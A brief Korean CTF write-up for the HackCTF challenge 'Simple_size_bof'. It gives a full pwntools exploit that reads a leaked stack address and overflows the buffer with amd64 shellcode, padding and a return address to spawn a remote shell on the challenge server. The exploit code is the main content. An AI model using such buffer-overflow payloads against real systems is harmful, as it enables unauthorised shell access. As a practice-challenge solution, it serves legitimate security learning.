7번줄에서 버퍼 주소를 출력해주니
쉘코드+더미+버퍼 주소를 쓰면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3005)
e = ELF('./Simple_size_bof')
context.arch = 'amd64'
shellcode = asm(shellcraft.amd64.linux.sh())
r.recvuntil('buf: ')
stack = int(r.recv(14), 16)
payload = shellcode
payload += 'A'*(27960-len(shellcode))
payload += p64(stack)
r.sendline(payload)
r.interactive()
'HackCTF > pwnable' 카테고리의 다른 글
HackCTF - Offset (0) | 2021.11.21 |
---|---|
HackCTF - Simple_Overflow_ver_2 (0) | 2021.11.21 |
HackCTF - x64 Buffer Overflow (0) | 2021.11.21 |
HackCTF - 내 버퍼가 흘러넘친다!!! (0) | 2021.11.20 |
HackCTF - Basic_FSB (0) | 2021.11.20 |